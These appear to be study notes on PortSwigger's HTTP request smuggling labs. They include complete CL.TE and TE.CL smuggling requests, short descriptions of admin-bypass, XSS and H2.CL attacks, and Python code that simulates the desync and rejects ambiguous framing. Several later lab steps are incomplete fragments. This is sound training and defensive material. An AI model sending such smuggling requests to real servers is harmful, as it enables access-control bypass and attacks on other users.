labs

Lab - 1: HTTP request smuggling, basic CL.TE vulnerability (P)

  • This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.

  • Send this request twice:

POST / HTTP/1.1
Host: 0a540036047255c3c3ba1b66004300fe.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
  • The front-end server uses Content-Length (6 bytes), so it accepts and forwards the whole body. The back-end server uses Transfer-Encoding and stops at the terminating 0 chunk, so the G is left over from the first request; it is prepended to the second request, which the back-end sees as GPOST and answers with an error.


Lab - 2: HTTP request smuggling, basic TE.CL vulnerability (P)

  • This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.

POST / HTTP/1.1
Host: 0ae3007c043a9f14c0d3485f00be006d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Connection: keep-alive

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
  • The two line breaks (CRLF CRLF) after the 0 are important: they terminate the chunked body that the front-end server (TE) reads and forwards in full. The back-end server (CL) reads only 4 bytes, 5c plus CRLF, and the GPOST request is left for the next round.
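  • Added example (not part of the original notes) showing why Labs 1 and 2 desync: a Content-Length parser and a chunked parser consume different amounts of the same bytes, and whatever the back-end leaves unread becomes the start of the next request. The host name is a placeholder and the requests are rebuilt with CRLF line endings.

```python
# Constructed demo, not part of the original notes: a Content-Length (CL) parser
# and a Transfer-Encoding (TE) parser take different amounts of the same bytes,
# which is the CL.TE / TE.CL desync of Labs 1 and 2. Host is a placeholder.
LAB1_CL_TE = (
    b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG"
)
SMUGGLED = (b"GPOST / HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded"
            b"\r\nContent-Length: 15\r\n\r\nx=1")       # 92 bytes = 0x5c, as in Lab 2
LAB2_TE_CL = (
    b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
    + b"%x\r\n" % len(SMUGGLED) + SMUGGLED + b"\r\n0\r\n\r\n"
)

def parse(stream):
    """Split a raw request into (request line, {name: [values]}, body bytes)."""
    head, _, body = stream.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body

def cl_len(headers, body):
    """CL framing: the body is exactly N bytes, whatever they contain."""
    return int(headers[b"content-length"][0])

def te_len(headers, body):
    """TE framing: the body ends after the 0 chunk and its (empty) trailer line."""
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)
        pos = end + 2
        if size == 0:
            return body.index(b"\r\n", pos) + 2
        pos += size + 2                       # chunk data plus its own CRLF

FRAMERS = {"CL": cl_len, "TE": te_len}

def leftover_for_backend(stream, front, back):
    """Bytes the back-end leaves unread after the first request; it treats them
    as the start of the next request on that connection (b'' means no desync)."""
    _, headers, body = parse(stream)
    forwarded = body[: FRAMERS[front](headers, body)]   # what the front-end relays
    return forwarded[FRAMERS[back](headers, forwarded):]
```

With a CL front-end and TE back-end the Lab 1 request leaves exactly b"G" behind; with a TE front-end and CL back-end the Lab 2 request leaves the whole GPOST request behind, while matching framing on both sides leaves nothing.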


Lab - 3: HTTP request smuggling, obfuscating the TE header (P)

  • This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren't using the GET or POST method. To solve the lab, smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST.
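  • Added example (not part of the original notes): the framing check a front-end or WAF rule should apply so that requests with conflicting, duplicated or obfuscated framing headers, as in Labs 1 to 3, are rejected instead of being forwarded for the back-end to interpret differently. The sample heads are constructed and the host is a placeholder.

```python
# Constructed example, not part of the original notes: the header check a
# front-end or WAF rule should run so that requests with duplicated or
# obfuscated framing headers (Lab 3) are rejected rather than forwarded for
# the back-end to interpret differently (RFC 7230 section 3.3.3).
import re

def framing_problems(raw_head):
    """Return the reasons to reject a request head; [] means the length is unambiguous."""
    cl, te, problems = [], [], []
    for line in raw_head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name != name.rstrip():
            problems.append("whitespace before the colon in %r" % name)
        name, value = name.strip().lower(), value.strip().lower()
        if name == b"content-length":
            cl.append(value)
        elif name == b"transfer-encoding":
            te.append(value)
    if cl and te:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(cl) > 1 or len(te) > 1:
        problems.append("duplicate framing header")
    if te and te[-1] != b"chunked":
        problems.append("last Transfer-Encoding value %r is not 'chunked'" % te[-1])
    if any(not re.fullmatch(rb"[0-9]+", v) for v in cl):
        problems.append("Content-Length is not a plain decimal number")
    return problems

# Constructed sample heads: Lab 1's request, a duplicated TE header as in Lab 3,
# and an unambiguous POST. Host is a placeholder.
LAB1_HEAD = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
             b"Content-Length: 6\r\nTransfer-Encoding: chunked")
DUP_TE_HEAD = (b"POST / HTTP/1.1\r\nHost: lab.example\r\n"
               b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity")
CLEAN_HEAD = b"POST / HTTP/1.1\r\nHost: lab.example\r\nContent-Length: 3"
```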


How to find

Lab - 4: HTTP request smuggling, confirming a CL.TE vulnerability via differential responses (P)

  • This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.


Lab - 5: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses (P)

  • This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.


How to exploit

Lab - 6: Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability (P)

  • This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it. To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.

  1. Try with

  • Get 401 Unauthorized

  • Duplicate header names are not allowed

  • Get the admin panel

  • Change the smuggled request to GET /admin/delete?username=carlos to solve the lab


Lab - 7: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability (P)

  • This lab involves a front-end and back-end server, and the back-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it. To solve the lab, smuggle a request to the back-end server that accesses the admin panel and deletes the user carlos.

  • The front-end server uses TE and forwards the whole request to the back-end.

  • The back-end server uses CL: in the first request only the bytes up to 87 (the chunk-size line) are processed, and the rest remain for the next round.

  • 87 is hexadecimal (135 decimal), the number of characters from GET /admin/... to x=4.


Lab - 8: Exploiting HTTP request smuggling to reveal front-end request rewriting (P)

  • This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but it's only accessible to people with the IP address 127.0.0.1. The front-end server adds an HTTP header to incoming requests containing their IP address. It's similar to the X-Forwarded-For header but has a different name. To solve the lab, smuggle a request to the back-end server that reveals the header that is added by the front-end server. Then smuggle a request to the back-end server that includes the added header, accesses the admin panel, and deletes the user carlos.

  • First test whether it is CL.TE or TE.CL; it is CL.TE.

  • There is a search parameter in a POST request whose value is reflected back.

  • To find which header carries the IP address

  • and found that

  • after trying a little bit


Lab - 9: Exploiting HTTP request smuggling to deliver reflected XSS (P)

  • This lab involves a front-end and back-end server, and the front-end server doesn't support chunked encoding. The application is also vulnerable to reflected XSS via the User-Agent header. To solve the lab, smuggle a request to the back-end server that causes the next user's request to receive a response containing an XSS exploit that executes alert(1).

  • First test whether it is CL.TE or TE.CL; it is CL.TE.

  • Reflected XSS on the blog post page


Lab - 10: H2.CL request smuggling (P)

  • This lab is vulnerable to request smuggling because the front-end server downgrades HTTP/2 requests even if they have an ambiguous length.

To solve the lab, perform a request smuggling attack that causes the victim's browser to load a malicious JavaScript file from the exploit server and call alert(document.cookie). The victim user accesses the home page every 10 seconds.
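Added example (not part of the original notes): the length handling an HTTP/2-to-HTTP/1.1 downgrade needs so that the ambiguity behind H2.CL cannot reach the back-end. The request model (pseudo-header dict, header list, concatenated DATA payload) is a simplified stand-in and the host is a placeholder.

```python
# Constructed example, not part of the original notes: the length handling an
# HTTP/2-to-HTTP/1.1 downgrade needs so that an H2.CL desync (Lab 10) cannot
# start. In HTTP/2 the body length is given by the DATA frames; a content-length
# header is optional and must agree with them. The request model is simplified.
def length_problem(headers, data):
    """Return why the client's length claims are unusable, or None if they are fine."""
    if any(n.lower() == b"transfer-encoding" for n, _ in headers):
        return "transfer-encoding is not allowed in HTTP/2 (RFC 7540 8.1.2.2)"
    claimed = [v for n, v in headers if n.lower() == b"content-length"]
    if len(claimed) > 1:
        return "more than one content-length header"
    if claimed and claimed[0] != b"%d" % len(data):
        return "content-length %r disagrees with %d DATA bytes" % (claimed[0], len(data))
    return None

def downgrade_h2(pseudo, headers, data):
    """Build the HTTP/1.1 request to send downstream. pseudo: {b':method', b':path',
    b':authority'}; headers: list of (name, value) bytes pairs; data: the
    concatenated DATA frame payload. Raises ValueError on an ambiguous length."""
    problem = length_problem(headers, data)
    if problem:
        raise ValueError(problem)          # the front-end must not forward this request
    lines = [b"%s %s HTTP/1.1" % (pseudo[b":method"], pseudo[b":path"]),
             b"Host: " + pseudo[b":authority"]]
    lines += [n + b": " + v for n, v in headers if n.lower() != b"content-length"]
    lines.append(b"Content-Length: %d" % len(data))   # derived from the frames, never copied
    return b"\r\n".join(lines) + b"\r\n\r\n" + data
```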
